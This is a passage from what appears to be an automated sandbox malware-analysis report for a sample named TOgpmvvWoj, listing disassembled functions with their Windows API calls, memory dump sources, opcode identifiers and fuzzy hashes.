                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetModuleHandleExW$kernel32.dll
                                            • API String ID: 2574300362-199464113
                                            • Opcode ID: 9cc949d1a7ee830c9d2f48fa96c519ae4b6b9765f9bc06d7413d9eeaa3d50246
                                            • Instruction ID: c14123f421b57d4b3032ba762fa333fb34a1a70ed4381303db03707284dddd10
                                            • Opcode Fuzzy Hash: 9cc949d1a7ee830c9d2f48fa96c519ae4b6b9765f9bc06d7413d9eeaa3d50246
                                            • Instruction Fuzzy Hash: 79D0C230900313CFC7206F32D94860272D4AF01345B14D83FD499F2551E670C480C750
                                            Function 00E676C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c91d63bd60a85bcad93d78b552c94af169a77a7a25ee1f4b9a398ee0356e5321
                                            • Instruction ID: 50e247844a1343143e77768004d2fed0b6fc52dd29a687c8891ddc9b0dfd710b
                                            • Opcode Fuzzy Hash: c91d63bd60a85bcad93d78b552c94af169a77a7a25ee1f4b9a398ee0356e5321
                                            • Instruction Fuzzy Hash: 59C1A274A04216EFCB14CFA4D884EAEBBF5FF48758B119599E885EB250D730ED81CB90
                                            Function 00E8E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CharLowerBuffW.USER32(?,?), ref: 00E8E3D2
                                            • CharLowerBuffW.USER32(?,?), ref: 00E8E415
                                              • Part of subcall function 00E8DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E8DAD9
                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E8E615
                                            • _memmove.LIBCMT ref: 00E8E628
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                            • String ID:
                                            • API String ID: 3659485706-0
                                            • Opcode ID: 9422afe345f18b5d020c1de491eec0084c0dcb1570e253cfa8e1572271adf264
                                            • Instruction ID: 79bd3a39f7e712fd65835b95b05c098ee5a9edcdbc817f8a1048a07d9501ae70
                                            • Opcode Fuzzy Hash: 9422afe345f18b5d020c1de491eec0084c0dcb1570e253cfa8e1572271adf264
                                            • Instruction Fuzzy Hash: 6FC168716083018FC714EF28C49096ABBE5FF88718F14996EF89DAB351D731E946CB82
                                            Function 00E883A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                            Download Yara Rule
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 00E883D8
                                            • CoUninitialize.OLE32 ref: 00E883E3
                                              • Part of subcall function 00E6DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E6DAC5
                                            • VariantInit.OLEAUT32(?), ref: 00E883EE
                                            • VariantClear.OLEAUT32(?), ref: 00E886BF
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                            • String ID:
                                            • API String ID: 780911581-0
                                            • Opcode ID: 343cef565403cd19e1b3b32513fbf4f65c81025da4607f5b485e883f53164fb1
                                            • Instruction ID: e13a1a021840c458cf4ea0ef42d1ecec6ce6305a8ff33a9e538f89cbd03756c2
                                            • Opcode Fuzzy Hash: 343cef565403cd19e1b3b32513fbf4f65c81025da4607f5b485e883f53164fb1
                                            • Instruction Fuzzy Hash: BFA148752047019FCB10EF14C991A6AB7E5BF88314F54A449F99EAB3A2DB30ED44CB82
                                            Function 00E66DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Variant$AllocClearCopyInitString
                                            • String ID:
                                            • API String ID: 2808897238-0
                                            • Opcode ID: 05df49f6ecebe1310b69048b7e82edf6940a9765f6427340c89f702f75da836d
                                            • Instruction ID: 799d74b391d5ad6a0aec9bd678d2276532739509397dbd79c87bf986f86e2b76
                                            • Opcode Fuzzy Hash: 05df49f6ecebe1310b69048b7e82edf6940a9765f6427340c89f702f75da836d
                                            • Instruction Fuzzy Hash: 9451F9307943019ADB60AF65F495A6EB3E5AF48354F30B81FE5D6FB292DB309880DB11
                                            Function 00E99A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowRect.USER32(0104E5A0,?), ref: 00E99AD2
                                            • ScreenToClient.USER32(00000002,00000002), ref: 00E99B05
                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00E99B72
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$ClientMoveRectScreen
                                            • String ID:
                                            • API String ID: 3880355969-0
                                            • Opcode ID: fceebaec034a564a88bcf5bcafae4bb06d8c908549514e8ca5091ddf87dccccf
                                            • Instruction ID: 74a9808bd8f74468be7db007867ef75e96696007073c3f1f5ee9424b92d165a5
                                            • Opcode Fuzzy Hash: fceebaec034a564a88bcf5bcafae4bb06d8c908549514e8ca5091ddf87dccccf
                                            • Instruction Fuzzy Hash: BE514F34A00209EFCF14DF68E8809AE7BB5FF45324F10915EF815AB291E734AD81CB94
                                            Function 00E86CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00E86CE4
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E86CF4
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E86D58
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E86D64
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorLast$__itow__swprintfsocket
                                            • String ID:
                                            • API String ID: 2214342067-0
                                            • Opcode ID: 94bd534c27cef0815d925ec08dc93e2c0051d00708d69e60ea8c1795739662c2
                                            • Instruction ID: 95ca576ca09ac8190cfcde345fdbb8afd6309ede1bbef0af5e906fbb0c684457
                                            • Opcode Fuzzy Hash: 94bd534c27cef0815d925ec08dc93e2c0051d00708d69e60ea8c1795739662c2
                                            • Instruction Fuzzy Hash: 56419175740200AFEB20BF24DC96FBA77E5AB44B14F449019FA59BB2D3DA709D408791
                                            Function 00E8672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                            Download Yara Rule
                                            APIs
                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00E9F910), ref: 00E867BA
                                            • _strlen.LIBCMT ref: 00E867EC
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _strlen
                                            • String ID:
                                            • API String ID: 4218353326-0
                                            • Opcode ID: 1fb62fc8581f3c8f4aedc5b09afa68c7575e6d120842a2992ef694172d2a00f9
                                            • Instruction ID: 3465fa220f113809d1cb8cac81688eda49f7176d2566010aa9041920e4cab1dc
                                            • Opcode Fuzzy Hash: 1fb62fc8581f3c8f4aedc5b09afa68c7575e6d120842a2992ef694172d2a00f9
                                            • Instruction Fuzzy Hash: 3C416D31A00104AFCB18FBA4DDD5EEEB7E9AF44314F149165F81EBB292DA30AD44CB90
                                            Function 00E7BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E7BB09
                                            • GetLastError.KERNEL32(?,00000000), ref: 00E7BB2F
                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E7BB54
                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E7BB80
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                            • String ID:
                                            • API String ID: 3321077145-0
                                            • Opcode ID: 547bd49483e3d31b367fea52f7d8d09f13bcb3a2daacaa17bceefa4f1bd88608
                                            • Instruction ID: 227375d131ec2522c17a92623bec6a0159a5e1dda3e9d71c154041749cb32e06
                                            • Opcode Fuzzy Hash: 547bd49483e3d31b367fea52f7d8d09f13bcb3a2daacaa17bceefa4f1bd88608
                                            • Instruction Fuzzy Hash: E9412239200610DFCB21EF15C594A9DBBE1AF89324B09D499FC4AAB362CB34FD41CB91
                                            Function 00E98AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                            Download Yara Rule
                                            APIs
                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E98B4D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: InvalidateRect
                                            • String ID:
                                            • API String ID: 634782764-0
                                            • Opcode ID: 32f96358266607abd1e0f9cacda6eeb96a9aba1bacf744af6fc03de70d20c91b
                                            • Instruction ID: ce20e0569d9718114b36c7468f0a18b6ac4678b4f45ec21f3ad9de84e847fb70
                                            • Opcode Fuzzy Hash: 32f96358266607abd1e0f9cacda6eeb96a9aba1bacf744af6fc03de70d20c91b
                                            • Instruction Fuzzy Hash: 9B31B2B8600204BEEF249E18DE55FED37A5EB07314F286616FA55F72B1EE30AD409641
                                            Function 00E9ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ClientToScreen.USER32(?,?), ref: 00E9AE1A
                                            • GetWindowRect.USER32(?,?), ref: 00E9AE90
                                            • PtInRect.USER32(?,?,00E9C304), ref: 00E9AEA0
                                            • MessageBeep.USER32(00000000), ref: 00E9AF11
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Rect$BeepClientMessageScreenWindow
                                            • String ID:
                                            • API String ID: 1352109105-0
                                            • Opcode ID: 2a37deeb60337b26ced983f7b7d64f210872ca3bab3cacaa9fc4f1857e81d967
                                            • Instruction ID: c3c674896d4cb6dc04cbd98e36c388262ec91ff3f75bbde321e30090e60382fe
                                            • Opcode Fuzzy Hash: 2a37deeb60337b26ced983f7b7d64f210872ca3bab3cacaa9fc4f1857e81d967
                                            • Instruction Fuzzy Hash: 84418A74600219DFCF15CF59D884AA9BBF5FF49340F2891BAE814EB261D730A885DB92
                                            Function 00E70FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E71037
                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E71053
                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E710B9
                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E7110B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: KeyboardState$InputMessagePostSend
                                            • String ID:
                                            • API String ID: 432972143-0
                                            • Opcode ID: bc13505ea3a3672356b0e609e617859dc116ad9364931be5109a2a3d1f7e7037
                                            • Instruction ID: 0dc1a99f46249dc7738bc09dc1d91563d433e3ecef37bb69b0f64d6b914bb854
                                            • Opcode Fuzzy Hash: bc13505ea3a3672356b0e609e617859dc116ad9364931be5109a2a3d1f7e7037
                                            • Instruction Fuzzy Hash: 6A313730E40788AEFB308A6E8C05BF9BBA9AB45314F04D29AE598B21D1C3748DC49751
                                            Function 00E71121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00E71176
                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E71192
                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E711F1
                                            • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00E71243
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: KeyboardState$InputMessagePostSend
                                            • String ID:
                                            • API String ID: 432972143-0
                                            • Opcode ID: ca1f53fd75ad485a16989fbff5fcccda167069ea44f837ff6109e57a216345b2
                                            • Instruction ID: 0ca821138b6ad88f9df60e417035bbf312037abbac5489ceb00885a85442c488
                                            • Opcode Fuzzy Hash: ca1f53fd75ad485a16989fbff5fcccda167069ea44f837ff6109e57a216345b2
                                            • Instruction Fuzzy Hash: 29316830941348AEEF308A6D8C04BFE7BAAAB49314F54E39BE588B61E1C3344D859751
                                            Function 00E46415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E4644B
                                            • __isleadbyte_l.LIBCMT ref: 00E46479
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E464A7
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E464DD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            • Opcode ID: 697189b3fa3a7cf8cfe82841fd96917b45829cb40587fb937158f1b2dad944b4
                                            • Instruction ID: cf0b47dc4a65359ae135bdb8f32001e31b76eae233426885f8ecd303bbf8ba1f
                                            • Opcode Fuzzy Hash: 697189b3fa3a7cf8cfe82841fd96917b45829cb40587fb937158f1b2dad944b4
                                            • Instruction Fuzzy Hash: BF31EF31600246AFDF258F75E844BAA7BA9FF42314F155029F864A71A1EB31DC90DB92
                                            Function 00E95175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetForegroundWindow.USER32 ref: 00E95189
                                              • Part of subcall function 00E7387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E73897
                                              • Part of subcall function 00E7387D: GetCurrentThreadId.KERNEL32 ref: 00E7389E
                                              • Part of subcall function 00E7387D: AttachThreadInput.USER32(00000000,?,00E752A7), ref: 00E738A5
                                            • GetCaretPos.USER32(?), ref: 00E9519A
                                            • ClientToScreen.USER32(00000000,?), ref: 00E951D5
                                            • GetForegroundWindow.USER32 ref: 00E951DB
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                            • String ID:
                                            • API String ID: 2759813231-0
                                            • Opcode ID: 17acbace63c45463dd61e4de7e142684277b19044ba8c9abe7075e5b7007f8c1
                                            • Instruction ID: 4523ab87f1798d65919e8c4c5d38c9d29e4d0e996a0ec2b03e78c6a9c7f22936
                                            • Opcode Fuzzy Hash: 17acbace63c45463dd61e4de7e142684277b19044ba8c9abe7075e5b7007f8c1
                                            • Instruction Fuzzy Hash: F1313E72900108AFDB00EFB5C885AEFB7F9EF98300F10506AE415F7252EA759E45CBA0
                                            Function 00E9C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • GetCursorPos.USER32(?), ref: 00E9C7C2
                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E4BBFB,?,?,?,?,?), ref: 00E9C7D7
                                            • GetCursorPos.USER32(?), ref: 00E9C824
                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E4BBFB,?,?,?), ref: 00E9C85E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                            • String ID:
                                            • API String ID: 2864067406-0
                                            • Opcode ID: cf4f193fe0a044646a43f2b0bd24c7050603a6d8eca0459bb05b6584a033a4f1
                                            • Instruction ID: 209ad22d1e1ec3fc4215ec155d79240d4705e04d935a18fc01fffc5d1a558a66
                                            • Opcode Fuzzy Hash: cf4f193fe0a044646a43f2b0bd24c7050603a6d8eca0459bb05b6584a033a4f1
                                            • Instruction Fuzzy Hash: BE319175600018AFCF29DF59DC98EEA7BF6EB49314F14406AF905AB261C731AD50DFA0
                                            Function 00E30BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                            Download Yara Rule
                                            APIs
                                            • __setmode.LIBCMT ref: 00E30BF2
                                              • Part of subcall function 00E15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E77B20,?,?,00000000), ref: 00E15B8C
                                              • Part of subcall function 00E15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E77B20,?,?,00000000,?,?), ref: 00E15BB0
                                            • _fprintf.LIBCMT ref: 00E30C29
                                            • OutputDebugStringW.KERNEL32(?), ref: 00E66331
                                              • Part of subcall function 00E34CDA: _flsall.LIBCMT ref: 00E34CF3
                                            • __setmode.LIBCMT ref: 00E30C5E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
